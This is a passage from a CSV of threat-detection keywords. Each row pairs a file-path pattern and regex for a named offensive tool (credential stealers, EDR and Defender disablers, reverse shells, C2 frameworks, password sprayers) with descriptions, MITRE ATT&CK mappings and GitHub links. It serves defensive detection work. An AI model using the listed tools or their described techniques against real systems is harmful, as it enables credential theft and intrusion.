Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","0","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\norton\getCredsnorton.h*",".{0,1000}\\norton\\getCredsnorton\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\norton\getCredsnorton2.h*",".{0,1000}\\norton\\getCredsnorton2\.h.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","0","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*\notavirus.exe*",".{0,1000}\\notavirus\.exe.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*\NovaLdr.exe",".{0,1000}\\NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*\NoveLdr.exe",".{0,1000}\\NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*\NPPSpy.c*",".{0,1000}\\NPPSpy\.c.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\NPPSPY.dll*",".{0,1000}\\NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\NPPSpy.exe*",".{0,1000}\\NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\NPPSpy.txt*",".{0,1000}\\NPPSpy\.txt.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","0","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\nReversed shellcode:\n*",".{0,1000}\\nReversed\sshellcode\:\\n.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","10","7","N/A","N/A","N/A","N/A" "*\NSudo.bat*",".{0,1000}\\NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\NSudo.exe*",".{0,1000}\\NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\NSudoC.exe*",".{0,1000}\\NSudoC\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\NSudoG.exe*",".{0,1000}\\NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ntdll_unhooking.exe*",".{0,1000}\\ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\ntdlll-unhooking-collection*",".{0,1000}\\ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*\ntdlol.txt*",".{0,1000}\\ntdlol\.txt.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*\ntdsutil.py*",".{0,1000}\\ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NTHASH-FPC\*",".{0,1000}\\NTHASH\-FPC\\.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "*\ntlm.py*",".{0,1000}\\ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\ntlmdecoder.py*",".{0,1000}\\ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*\NTLMRelay2Self*",".{0,1000}\\NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*\NtlmRelayToEWS\*",".{0,1000}\\NtlmRelayToEWS\\.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","0","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*\NtlmThief\*",".{0,1000}\\NtlmThief\\.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*\ntlmutil.py*",".{0,1000}\\ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","0","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*\ntlmv1.py*",".{0,1000}\\ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\NtoskrnlOffsets.csv*",".{0,1000}\\NtoskrnlOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","3","230","42","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" "*\NtRemoteLoad.exe*",".{0,1000}\\NtRemoteLoad\.exe.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\NtRemoteLoad.sln*",".{0,1000}\\NtRemoteLoad\.sln.{0,1000}","offensive_tool_keyword","NtRemoteLoad","Remote Shellcode Injector","T1055 - T1027 - T1218.010","TA0002 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/florylsk/NtRemoteLoad","1","0","N/A","10","2","199","37","2023-08-27T17:14:44Z","2023-08-27T16:52:31Z" "*\NtRights\*",".{0,1000}\\NtRights\\.{0,1000}","offensive_tool_keyword","NtRights","tool for adding privileges from the commandline","T1548.002 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/gtworek/PSBits/tree/master/NtRights","1","1","N/A","7","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*\Nuages_Cli*",".{0,1000}\\Nuages_Cli.{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*\nxc.exe*",".{0,1000}\\nxc\.exe.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\nxc\parsers\ip.py*",".{0,1000}\\nxc\\parsers\\ip\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\nxc\parsers\nmap.py*",".{0,1000}\\nxc\\parsers\\nmap\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*\Obfuscar.Console.exe*",".{0,1000}\\Obfuscar\.Console\.exe.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*\Obfuscated-Code.py*",".{0,1000}\\Obfuscated\-Code\.py.{0,1000}","offensive_tool_keyword","var0xshell","var0xshell - shell with xor encryption","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/var0xshell/tree/main","1","0","N/A","8","10","3","1","2023-01-09T06:53:42Z","2023-01-08T21:34:26Z" "*\obfuscation.exe --help*",".{0,1000}\\obfuscation\.exe\s\-\-help.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*\obfy-1.0.zip*",".{0,1000}\\obfy\-1\.0\.zip.{0,1000}","offensive_tool_keyword","obfy","A tiny C++ obfuscation framework","T1027 - T1064 - T1140","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/fritzone/obfy","1","1","N/A","N/A","7","609","97","2020-06-10T13:28:32Z","2015-11-13T13:28:23Z" "*\oem\Desktop\backdoor*",".{0,1000}\\oem\\Desktop\\backdoor.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z" "*\OffensiveCpp\",".{0,1000}\\OffensiveCpp\\","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\OffensiveCpp-main*",".{0,1000}\\OffensiveCpp\-main.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*\OffensiveCSharp\*",".{0,1000}\\OffensiveCSharp\\.{0,1000}","offensive_tool_keyword","OffensiveCSharp","Collection of Offensive C# Tooling","T1059.001 - T1055.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*\Offensive-Netsh-Helper\*",".{0,1000}\\Offensive\-Netsh\-Helper\\.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*\Offensive-Netsh-Helper-master*",".{0,1000}\\Offensive\-Netsh\-Helper\-master.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*\OfficePersistence.ps1*",".{0,1000}\\OfficePersistence\.ps1.{0,1000}","offensive_tool_keyword","Office-Persistence","Use powershell to test Office-based persistence methods","T1059.001 - T1137 - T1116","TA0003 ","N/A","N/A","Persistence","https://github.com/3gstudent/Office-Persistence","1","0","N/A","9","1","76","24","2021-04-17T01:39:13Z","2017-07-14T10:03:35Z" "*\OfflineKeyloggerPipe*",".{0,1000}\\OfflineKeyloggerPipe.{0,1000}","offensive_tool_keyword","xeno-rat","Xeno-RAT is an open-source remote access tool (RAT) developed in C# providing a comprehensive set of features for remote system management. Has features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","named pipe","10","10","679","210","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z" "*\oh365userfinder.py*",".{0,1000}\\oh365userfinder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*\onesixtyone.py*",".{0,1000}\\onesixtyone\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\online_brute.gz*",".{0,1000}\\online_brute\.gz.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*\oracle-patator.py*",".{0,1000}\\oracle\-patator\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\oracle-scanner.py*",".{0,1000}\\oracle\-scanner\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\oracle-tnscmd.py*",".{0,1000}\\oracle\-tnscmd\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*\os\windows\pkg\evasion\evasion*",".{0,1000}\\os\\windows\\pkg\\evasion\\evasion.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*\oSpray.py*",".{0,1000}\\oSpray\.py.{0,1000}","offensive_tool_keyword","Okta-Password-Sprayer","This script is a multi-threaded Okta password sprayer.","T1110 - T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/Rhynorater/Okta-Password-Sprayer","1","0","N/A","10","1","64","16","2024-01-05T16:24:38Z","2018-09-24T23:39:16Z" "*\ouned_smbserver.py*",".{0,1000}\\ouned_smbserver\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","0","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*\out_pe.exe*",".{0,1000}\\out_pe\.exe.{0,1000}","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","0","N/A","N/A","3","203","37","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" "*\OutFileCommand.cs",".{0,1000}\\OutFileCommand\.cs","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*\Outflank-Recon-AD\*",".{0,1000}\\Outflank\-Recon\-AD\\.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*\OutlookEmails.log*",".{0,1000}\\OutlookEmails\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*\Out-Minidump.ps1*",".{0,1000}\\Out\-Minidump\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*\owa-valid-users.txt*",".{0,1000}\\owa\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*\padre\pkg\exploit*",".{0,1000}\\padre\\pkg\\exploit.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","0","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*\pamspy.bpf.c*",".{0,1000}\\pamspy\.bpf\.c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*\pamspy_event.h*",".{0,1000}\\pamspy_event\.h.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 